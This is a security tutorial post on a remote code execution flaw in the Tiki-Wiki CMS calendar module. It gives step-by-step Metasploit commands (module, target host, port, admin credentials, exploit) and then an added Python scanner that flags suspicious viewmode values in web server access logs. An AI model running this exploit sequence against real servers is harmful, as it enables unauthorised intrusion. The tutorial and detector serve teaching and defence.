Tiki-Wiki CMS's calendar module contains a remote code execution vulnerability in the viewmode GET parameter. The calendar module is not enabled by default, and when it is enabled the default permissions do not allow anonymous users to access it. Vulnerable versions: <=14.1, <=12.4 LTS, <=9.10 LTS and <=6.14. Verified/tested against 14.1.
Exploit Targets
tiki-wiki 14.1
Requirement
Attacker: Kali Linux
Victim PC: Linux, Windows
Open a Kali terminal and type msfconsole
Now type use exploit/linux/http/tiki_calendar_exec
msf exploit (tiki_calendar_exec)>set targeturi /tiki
msf exploit (tiki_calendar_exec)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (tiki_calendar_exec)>set username admin
msf exploit (tiki_calendar_exec)>set password raj123
msf exploit (tiki_calendar_exec)>set rport 81
msf exploit (tiki_calendar_exec)>exploit
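For defenders, requests that abuse the viewmode GET parameter can be looked for in the web server's access log. The following is an added example, not part of the original post or of Tiki or Metasploit: it assumes a common/combined log format, that the calendar page is served as tiki-calendar.php, and that legitimate viewmode values are the plain view names in the allowlist; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumptions: calendar script name and the set of legitimate view names;
# adjust both to the deployment being monitored.
CALENDAR_SCRIPT = "tiki-calendar.php"
ALLOWED_VIEWMODES = {"day", "week", "month", "quarter", "semester", "year"}

# Client, request target and status from a common/combined-format log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def suspicious_viewmode(line):
    """Return (client, status, value) when the calendar script is requested
    with a viewmode value outside the allowlist, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target, status = m.group(1), m.group(2), int(m.group(3))
    parts = urlsplit(target)
    if not parts.path.endswith("/" + CALENDAR_SCRIPT):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("viewmode", []):
        # parse_qs decoded once; decode again so double-encoded values
        # are compared and reported in plain form.
        decoded = unquote(value)
        if decoded.lower() not in ALLOWED_VIEWMODES:
            return client, status, decoded
    return None


def scan(lines):
    """Collect findings from an iterable of access-log lines."""
    return [hit for hit in map(suspicious_viewmode, lines) if hit]


# Constructed sample lines (not captured traffic); the flagged value is a placeholder.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /tiki/tiki-calendar.php?viewmode=week HTTP/1.1" 200 5120',
    '192.0.2.44 - admin [01/Jan/2024:10:00:05 +0000] "GET /tiki/tiki-calendar.php?viewmode=PLACEHOLDER%2528%2529 HTTP/1.1" 200 312',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /tiki/tiki-index.php?viewmode=zzz HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, status, value in scan(SAMPLE_LOG):
        print(f"{client} status={status} viewmode={value!r}")
```

Any hit on a host running one of the vulnerable versions listed above is worth triaging together with the authenticated session that issued it, since the default permissions require a logged-in user to reach the calendar.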
The post Exploit Remote Server using Tiki-Wiki CMS Calendar Command Execution appeared first on Hacking Articles.